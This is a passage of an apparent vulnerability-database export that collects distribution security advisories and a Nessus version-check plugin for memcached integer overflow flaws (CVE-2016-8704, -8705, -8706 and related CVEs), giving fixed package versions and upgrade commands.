a red flag for administrators around the world,\" the researchers concluded.\n\n> \n\"If left unaddressed the vulnerabilities could be leveraged to impact organisations globally and affect business severely. It is highly recommended that these systems be patched immediately to help mitigate the risk to organisations.\"\n\n \nCustomers and organisations are advised to apply the patch as soon as possible even to Memcached deployments in \"trusted\" environments, as attackers with existing access could target vulnerable servers to move laterally within those networks.\n", "modified": "2017-07-18T15:52:43", "published": "2017-07-18T04:52:00", "id": "THN:D62B44A1B8B3D803033457090AB49300", "href": "https://thehackernews.com/2017/07/memcached-vulnerabilities.html", "type": "thn", "title": "Over 70,000 Memcached Servers Still Vulnerable to Remote Hacking", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2019-05-30T02:22:27", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3704-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nNovember 03, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : memcached\nCVE ID : CVE-2016-8704 CVE-2016-8705 CVE-2016-8706\nDebian Bug : 842811 842812 842814\n\nAleksandar Nikolic of Cisco Talos discovered several integer overflow\nvulnerabilities in memcached, a high-performance memory object caching\nsystem. A remote attacker can take advantage of these flaws to cause a\ndenial of service (daemon crash), or potentially to execute arbitrary\ncode.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.4.21-1.1+deb8u1.\n\nWe recommend that you upgrade your memcached packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2016-11-03T16:24:31", "published": "2016-11-03T16:24:31", "id": "DEBIAN:DSA-3704-1:B1F3F", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00287.html", "title": "[SECURITY] [DSA 3704-1] memcached security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:42", "bulletinFamily": "unix", "cvelist": ["CVE-2013-7291", "CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "Package : memcached\nVersion : 1.4.13-0.2+deb7u2\nCVE ID : CVE-2013-7291 CVE-2016-8704 CVE-2016-8705 CVE-2016-8706\nDebian Bug : 735314 842811 842812 842814\n\n\nMultiple vulnerabilites have been found in memcached, a high-performance\nmemory object caching system. A remote attacker could take advantage of\nthese flaws to cause a denial of service (daemon crash), or potentially\nto execute arbitrary code.\t\n\nCVE-2013-7291\n\n It was discovered that memcached, when running in verbose mode, can\n be crashed by sending carefully crafted requests that trigger an\n unbounded key print, resulting in a daemon crash.\n\nCVE-2016-8704, CVE-2016-8705, CVE-2016-8706\n\n Aleksandar Nikolic of Cisco Talos found several vulnerabilities in\n memcached. A remote attacker could cause an integer overflow by\n sending carefully crafted requests to the memcached server,\n resulting in a daemon crash.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n1.4.13-0.2+deb7u2.\n\nWe recommend that you upgrade your memcached packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n\n- -- \nJonas Meurer\n\n\n", "edition": 2, "modified": "2016-11-05T14:57:45", "published": "2016-11-05T14:57:45", "id": "DEBIAN:DLA-701-1:E0C8E", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201611/msg00009.html", "title": "[SECURITY] [DLA 701-1] memcached security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:10", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2017-9951"], "description": "Package : memcached\nVersion : 1.4.13-0.2+deb7u3\nCVE ID : CVE-2017-9951\nDebian Bug : #868701\n\nIt was discovered that there was a remote denial-of-service (DoS) vulnerability\nin memcached, a high-performance memory object caching system.\n\nThe try_read_command function allowed remote attackers to cause a DoS via a\nrequest to add/set a key that makes a comparison between a signed and unsigned\ninteger which triggered a heap-based buffer over-read.\n\nThis vulnerability existed due to an incomplete upstream fix for CVE-2016-8705.\n\nFor Debian 7 "Wheezy", this issue has been fixed in memcached version\n1.4.13-0.2+deb7u3.\n\nWe recommend that you upgrade your memcached packages.\n\n\nRegards,\n\n- -- \n ,''`.\n : :' : Chris Lamb\n `. `'` lamby@debian.org / chris-lamb.co.uk\n `-\n\n", "edition": 2, "modified": "2017-07-20T09:08:24", "published": "2017-07-20T09:08:24", "id": "DEBIAN:DLA-1033-1:E6844", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201707/msg00025.html", "title": "[SECURITY] [DLA 1033-1] memcached security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:23:07", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2018-1000115", "CVE-2018-1000127", "CVE-2017-9951"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4218-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJune 06, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : memcached\nCVE ID : CVE-2017-9951 CVE-2018-1000115 CVE-2018-1000127\nDebian Bug : 868701 894404\n\nSeveral vulnerabilities were discovered in memcached, a high-performance\nmemory object caching system. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2017-9951\n\n Daniel Shapira reported a heap-based buffer over-read in memcached\n (resulting from an incomplete fix for CVE-2016-8705) triggered by\n specially crafted requests to add/set a key and allowing a remote\n attacker to cause a denial of service.\n\nCVE-2018-1000115\n\n It was reported that memcached listens to UDP by default. A remote\n attacker can take advantage of it to use the memcached service as a\n DDoS amplifier.\n\n Default installations of memcached in Debian are not affected by\n this issue as the installation defaults to listen only on localhost.\n This update disables the UDP port by default. Listening on the UDP\n can be re-enabled in the /etc/memcached.conf (cf.\n /usr/share/doc/memcached/NEWS.Debian.gz).\n\nCVE-2018-1000127\n\n An integer overflow was reported in memcached, resulting in resource\n leaks, data corruption, deadlocks or crashes.\n\nFor the oldstable distribution (jessie), these problems have been fixed\nin version 1.4.21-1.1+deb8u2.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 1.4.33-1+deb9u1.\n\nWe recommend that you upgrade your memcached packages.\n\nFor the detailed security status of memcached please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/memcached\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2018-06-06T18:52:57", "published": "2018-06-06T18:52:57", "id": "DEBIAN:DSA-4218-1:F15A6", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00147.html", "title": "[SECURITY] [DSA 4218-1] memcached security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:44:04", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "Aleksandar Nikolic discovered that Memcached incorrectly handled certain \nmalformed commands. A remote attacker could use this issue to cause \nMemcached to crash, resulting in a denial of service, or possibly execute \narbitrary code.", "edition": 5, "modified": "2016-11-02T00:00:00", "published": "2016-11-02T00:00:00", "id": "USN-3120-1", "href": "https://ubuntu.com/security/notices/USN-3120-1", "title": "Memcached vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2020-11-10T12:36:28", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "**Issue Overview:**\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the memcached binary protocol. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code. ([CVE-2016-8704 __](<https://access.redhat.com/security/cve/CVE-2016-8704>), [CVE-2016-8705 __](<https://access.redhat.com/security/cve/CVE-2016-8705>))\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in memcached's parsing of SASL authentication messages. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code. ([CVE-2016-8706 __](<https://access.redhat.com/security/cve/CVE-2016-8706>))\n\n \n**Affected Packages:** \n\n\nmemcached\n\n \n**Issue Correction:** \nRun _yum update memcached_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n memcached-1.4.15-9.13.amzn1.i686 \n memcached-debuginfo-1.4.15-9.13.amzn1.i686 \n memcached-devel-1.4.15-9.13.amzn1.i686 \n \n src: \n memcached-1.4.15-9.13.amzn1.src \n \n x86_64: \n memcached-1.4.15-9.13.amzn1.x86_64 \n memcached-devel-1.4.15-9.13.amzn1.x86_64 \n memcached-debuginfo-1.4.15-9.13.amzn1.x86_64 \n \n \n", "edition": 3, "modified": "2016-11-10T18:00:00", "published": "2016-11-10T18:00:00", "id": "ALAS-2016-761", "href": "https://alas.aws.amazon.com/ALAS-2016-761.html", "title": "Important: memcached", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2017-01-02T15:12:24", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "edition": 1, "description": "### Background\n\nmemcached is a high-performance, distributed memory object caching system \n\n### Description\n\nMultiple integer overflow vulnerabilities were discovered in memcached. Please review the CVE identifiers and Cisco TALOS reports referenced below for details. \n\n### Impact\n\nA remote attacker could abuse memcached\u2019s binary protocol leading to the remote execution of arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll memcached users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/memcached-1.4.33\"", "modified": "2017-01-02T00:00:00", "published": "2017-01-02T00:00:00", "href": "https://security.gentoo.org/glsa/201701-12", "id": "GLSA-201701-12", "type": "gentoo", "title": "memcached: Multiple vulnerabilities", "cvss": {"score": 0.0, "vector": "NONE"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:29", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "\nCisco Talos reports:\n\nMultiple integer overflow vulnerabilities exist within Memcached\n\t that could be exploited to achieve remote code execution on the\n\t targeted system. These vulnerabilities manifest in various Memcached\n\t functions that are used in inserting, appending, prepending, or\n\t modifying key-value data pairs. Systems which also have Memcached\n\t compiled with support for SASL authentication are also vulnerable to\n\t a third flaw due to how Memcached handles SASL authentication\n\t commands.\nAn attacker could exploit these vulnerabilities by sending a\n\t specifically crafted Memcached command to the targeted server.\n\t Additionally, these vulnerabilities could also be exploited to leak\n\t sensitive process information which an attacker could use to bypass\n\t common exploitation mitigations, such as ASLR, and can be triggered\n\t multiple times. This enables reliable exploitation which makes these\n\t vulnerabilities severe.\n\n", "edition": 5, "modified": "2016-10-31T00:00:00", "published": "2016-10-31T00:00:00", "id": "F4BF713F-6AC7-4B76-8980-47BF90C5419F", "href": "https://vuxml.freebsd.org/freebsd/f4bf713f-6ac7-4b76-8980-47bf90c5419f.html", "title": "memcached -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8704", "CVE-2016-8705", "CVE-2016-8706"], "description": "Arch Linux Security Advisory ASA-201611-1\n=========================================\n\nSeverity: Critical\nDate : 2016-11-01\nCVE-ID : CVE-2016-8704 CVE-2016-8705 CVE-2016-8706\nPackage : memcached\nType : arbitrary code execution\nRemote : Yes\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package memcached before version 1.4.32-1 is vulnerable to\narbitrary code execution.\n\nResolution\n==========\n\nUpgrade to 1.4.32-1.\n\n# pacman -Syu \"memcached>=1.4.32-1\"\n\nThe problems have been fixed upstream in version 1.4.32.\n\nWorkaround\n==========\n\nIf you do not use the binary protocol at all, a workaround is to start\nmemcached with \"-B ascii\" to disable it.\n\nDescription\n===========\n\n- CVE-2016-8704 (arbitrary code execution)\n\nAn integer overflow in the process_bin_append_prepend function which is\nresponsible for processing multiple commands of Memcached binary\nprotocol can be abused to cause heap overflow and lead to remote code\nexecution.\n\n- CVE-2016-8705 (arbitrary code execution)\n\nMultiple integer overflows in process_bin_update function which is\nresponsible for processing multiple commands of Memcached binary\nprotocol can be abused to cause heap overflow and lead to remote code\nexecution.\n\n- CVE-2016-8706 (arbitrary code execution)\n\nAn integer overflow in process_bin_sasl_auth function which is\nresponsible for authentication commands of Memcached binary protocol\ncan be abused to cause heap overflow and lead to remote code execution.\n\nImpact\n======\n\nA remote unauthenticated attacker can execute arbitrary code on the\naffected host.\n\nReferences\n==========\n\nhttp://www.talosintelligence.com/reports/TALOS-2016-0219/\nhttp://www.talosintelligence.com/reports/TALOS-2016-0220/\nhttp://www.talosintelligence.com/reports/TALOS-2016-0221/\nhttp://blog.talosintel.com/2016/10/memcached-vulnerabilities.html\nhttps://github.com/memcached/memcached/wiki/ReleaseNotes1433\nhttps://access.redhat.com/security/cve/CVE-2016-8704\nhttps://access.redhat.com/security/cve/CVE-2016-8705\nhttps://access.redhat.com/security/cve/CVE-2016-8706", "modified": "2016-11-01T00:00:00", "published": "2016-11-01T00:00:00", "id": "ASA-201611-1", "href": "https://security.archlinux.org/ASA-201611-1", "type": "archlinux", "title": "[ASA-201611-1] memcached: arbitrary code execution", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:31", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "[0:1.4.4-3.el6_8.1]\n- fix vulnerabilities allowing remote code execution (CVE-2016-8704,\n CVE-2016-8705, CVE-2016-8706)", "edition": 4, "modified": "2016-11-23T00:00:00", "published": "2016-11-23T00:00:00", "id": "ELSA-2016-2820", "href": "http://linux.oracle.com/errata/ELSA-2016-2820.html", "title": "memcached security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-22T17:06:59", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2013-7239", "CVE-2016-8706"], "description": "[0:1.4.15-10.el7_3.1]\n- fix vulnerabilities allowing remote code execution (CVE-2016-8704,\n CVE-2016-8705, CVE-2016-8706)\n[0:1.4.15-10]\n- fix binding to IPv6 address (#1298603)\n- enable SASL support (#1263696)\n- don't allow authentication with bad SASL credentials (CVE-2013-7239)", "edition": 5, "modified": "2016-11-23T00:00:00", "published": "2016-11-23T00:00:00", "id": "ELSA-2016-2819", "href": "http://linux.oracle.com/errata/ELSA-2016-2819.html", "title": "memcached security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:27:11", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "**CentOS Errata and Security Advisory** CESA-2016:2819\n\n\nmemcached is a high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load.\n\nSecurity Fix(es):\n\n* Two integer overflow flaws, leading to heap-based buffer overflows, were found in the memcached binary protocol. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code. (CVE-2016-8704, CVE-2016-8705)\n\n* An integer overflow flaw, leading to a heap-based buffer overflow, was found in memcached's parsing of SASL authentication messages. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code. (CVE-2016-8706)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2016-November/003682.html\n\n**Affected packages:**\nmemcached\nmemcached-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-2819.html", "edition": 3, "modified": "2016-11-25T16:47:41", "published": "2016-11-25T16:47:41", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2016-November/003682.html", "id": "CESA-2016:2819", "title": "memcached security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-08T03:36:19", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2016-8704"], "description": "**CentOS Errata and Security Advisory** CESA-2016:2820\n\n\nmemcached is a high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load.\n\nSecurity Fix(es):\n\n* Two integer overflow flaws, leading to heap-based buffer overflows, were found in the memcached binary protocol. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code. (CVE-2016-8704, CVE-2016-8705)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-November/034199.html\n\n**Affected packages:**\nmemcached\nmemcached-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-2820.html", "edition": 4, "modified": "2016-11-28T22:32:14", "published": "2016-11-28T22:32:14", "href": "http://lists.centos.org/pipermail/centos-announce/2016-November/034199.html", "id": "CESA-2016:2820", "title": "memcached security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:46:52", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8704", "CVE-2016-8705", "CVE-2016-8706"], "description": "memcached is a high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load.\n\nSecurity Fix(es):\n\n* Two integer overflow flaws, leading to heap-based buffer overflows, were found in the memcached binary protocol. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code. (CVE-2016-8704, CVE-2016-8705)\n\n* An integer overflow flaw, leading to a heap-based buffer overflow, was found in memcached's parsing of SASL authentication messages. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code. (CVE-2016-8706)", "modified": "2018-04-12T03:33:06", "published": "2016-11-23T09:43:57", "id": "RHSA-2016:2819", "href": "https://access.redhat.com/errata/RHSA-2016:2819", "type": "redhat", "title": "(RHSA-2016:2819) Important: memcached security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:35", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8704", "CVE-2016-8705"], "description": "Red Hat Mobile Application Platform (RHMAP) 4.2 is delivered as a set of Docker-formatted container images. In addition to the images, several components are delivered as RPMs:\n\n* OpenShift templates used to deploy an RHMAP Core and MBaaS\n* A diagnostic tool called 'fh-system-dump-tool', which can be used to collect information about the RHMAP cluster in case of problems\n\nThe following RPMs are included in the RHMAP container images, and are provided here only for completeness:\n\n* The Nagios server, which is used to monitor the status of RHMAP components, is installed inside the Nagios container image.\n* PhantomJS, a headless WebKit scriptable with a JavaScript API, is installed inside the MBaaS and Supercore container images.\n* 'mod_authnz_external', an Apache module used for authentication, is installed inside the httpd container image.\n\nA ZIP package containing client SDKs is also delivered as an optional download. The same ZIP file is also provided inside the 'rhmap42/fh-sdks' container image.\n\nThis release serves as an update for Red Hat Mobile Application Platform 4.2.0. It includes bug fixes and enhancements. Refer to the Red Hat Mobile Application Platform 4.2.1 Release Notes for information about the most significant bug fixes and enhancements included in this release.\n\nSecurity Fix(es):\n\n* An integer overflow flaw, leading to a heap-based buffer overflow, was found in the memcached binary protocol. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code. (CVE-2016-8704)\n\n* An integer overflow flaw, leading to a heap-based buffer overflow, was found in the memcached binary protocol. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code. (CVE-2016-8705)", "modified": "2017-01-11T21:28:02", "published": "2017-01-11T21:26:55", "id": "RHSA-2017:0059", "href": "https://access.redhat.com/errata/RHSA-2017:0059", "type": "redhat", "title": "(RHSA-2017:0059) Moderate: Red Hat Mobile Application Platform 4.2.1 Security Update - SDKs and RPMs", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:06", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8704", "CVE-2016-8705"], "description": "memcached is a high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load.\n\nSecurity Fix(es):\n\n* Two integer overflow flaws, leading to heap-based buffer overflows, were found in the memcached binary protocol. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code. (CVE-2016-8704, CVE-2016-8705)", "modified": "2018-06-06T20:24:17", "published": "2016-11-23T09:44:15", "id": "RHSA-2016:2820", "href": "https://access.redhat.com/errata/RHSA-2016:2820", "type": "redhat", "title": "(RHSA-2016:2820) Important: memcached security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8704", "CVE-2016-8705", "CVE-2016-8706"], "description": "memcached is a high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load. ", "modified": "2016-12-08T03:53:46", "published": "2016-12-08T03:53:46", "id": "FEDORA:ACF9D6101A4C", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: memcached-1.4.33-1.fc25", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8704", "CVE-2016-8705", "CVE-2016-8706"], "description": "memcached is a high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load. ", "modified": "2016-11-14T23:52:16", "published": "2016-11-14T23:52:16", "id": "FEDORA:9037C6068705", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: memcached-1.4.17-5.fc23", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8704", "CVE-2016-8705", "CVE-2016-8706"], "description": "memcached is a high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load. ", "modified": "2016-11-14T21:02:25", "published": "2016-11-14T21:02:25", "id": "FEDORA:8C07F604CD91", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: memcached-1.4.25-2.fc24", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2017-9951"], "description": "memcached is a high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load. ", "modified": "2017-11-22T02:32:28", "published": "2017-11-22T02:32:28", "id": "FEDORA:8EEC5601CEEA", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: memcached-1.4.39-1.fc26", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2017-9951"], "description": "memcached is a high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load. ", "modified": "2017-11-22T05:09:09", "published": "2017-11-22T05:09:09", "id": "FEDORA:C0B6E60419A6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: memcached-1.4.39-1.fc25", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-17T13:49:28", "description": "Security Fix(es) :\n\n - Two integer overflow flaws, leading to heap-based buffer\n overflows, were found in the memcached binary protocol.\n An attacker could create a specially crafted message\n that would cause the memcached server to crash or,\n potentially, execute arbitrary code. (CVE-2016-8704,\n CVE-2016-8705)\n\n - An integer overflow flaw, leading to a heap-based buffer\n overflow, was found in memcached's parsing of SASL\n authentication messages. An attacker could create a\n specially crafted message that would cause the memcached\n server to crash or, potentially, execute arbitrary code.\n (CVE-2016-8706)", "edition": 18, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-15T00:00:00", "title": "Scientific Linux Security Update : memcached on SL7.x x86_64 (20161123)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "modified": "2016-12-15T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:memcached", "p-cpe:/a:fermilab:scientific_linux:memcached-devel", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:memcached-debuginfo"], "id": "SL_20161123_MEMCACHED_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/95866", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95866);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n\n script_name(english:\"Scientific Linux Security Update : memcached on SL7.x x86_64 (20161123)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - Two integer overflow flaws, leading to heap-based buffer\n overflows, were found in the memcached binary protocol.\n An attacker could create a specially crafted message\n that would cause the memcached server to crash or,\n potentially, execute arbitrary code. (CVE-2016-8704,\n CVE-2016-8705)\n\n - An integer overflow flaw, leading to a heap-based buffer\n overflow, was found in memcached's parsing of SASL\n authentication messages. An attacker could create a\n specially crafted message that would cause the memcached\n server to crash or, potentially, execute arbitrary code.\n (CVE-2016-8706)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1612&L=scientific-linux-errata&F=&S=&P=14560\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cfa8ff8b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected memcached, memcached-debuginfo and / or\nmemcached-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:memcached\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:memcached-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:memcached-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = 